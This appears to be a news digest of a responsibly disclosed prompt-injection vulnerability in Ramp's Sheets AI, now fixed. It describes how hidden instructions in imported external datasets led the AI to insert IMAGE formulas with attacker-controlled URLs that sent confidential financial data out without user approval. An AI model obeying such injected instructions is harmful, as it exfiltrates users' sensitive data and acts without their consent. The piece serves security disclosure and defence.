Ramp's Sheets AI Exfiltrates Financials
5 hours ago
- #AI Security
- #Data Exfiltration
- #Prompt Injection
- A vulnerability in Ramp's Sheets AI allowed indirect prompt injections from untrusted external datasets to trigger malicious formula insertion without user approval, leading to potential exfiltration of sensitive financial data via external network requests.
- The attack chain involved users importing external data with hidden prompt injections, which manipulated the AI to insert formulas like IMAGE with attacker-controlled URLs that appended and transmitted confidential data.
- PromptArmor responsibly disclosed the issue to Ramp, and it was resolved on March 16, 2026; a similar vulnerability was previously identified and mitigated in Claude for Excel with warnings for external network traffic formulas.